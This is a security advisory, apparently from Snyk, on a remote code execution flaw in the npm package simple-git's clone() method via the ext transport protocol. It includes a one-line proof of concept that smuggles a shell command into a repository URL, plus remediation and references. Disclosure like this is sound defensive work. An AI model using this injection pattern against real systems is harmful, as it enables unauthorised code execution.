SNYK-JS-SIMPLEGIT-3112221
## Overview [simple-git](https://www.npmjs.com/package/simple-git) is a light weight interface for running git commands in any node.js application. Affected versions of this package are vulnerable to Remote Code Execution (RCE) when enabling the `ext` transport protocol, which makes it exploitable via `clone()` method. This vulnerability exists due to an incomplete fix of [CVE-2022-24066](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2434306). ## PoC ```js const simpleGit = require('simple-git') const git2 = simpleGit() git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]); ``` ## Remediation Upgrade `simple-git` to version 3.15.0 or higher. ## References - [GitHub Commit](https://github.com/steveukx/git-js/commit/774648049eb3e628379e292ea172dccaba610504) - [GitHub Release](https://github.com/steveukx/git-js/releases/tag/simple-git%403.15.0) - [Plugin-Unsafe-Actions Documentation](https://github.com/steveukx/git-js/blob/main/docs/PLUGIN-UNSAFE-ACTIONS.md#overriding-allowed-protocols)
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 0 |
Timeline
- Nov 10, 2022 CVE Updated
- Dec 5, 2022 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://www.npmjs.com/package/simple-git vendor
- https://github.com/steveukx/git-js/commit/774648049eb3e628379e292ea172dccaba610504 patch
- https://github.com/steveukx/git-js/releases/tag/simple-git%403.15.0 vendor
- https://github.com/steveukx/git-js/blob/main/docs/PLUGIN-UNSAFE-ACTIONS.md#overriding-allowed-protocols technical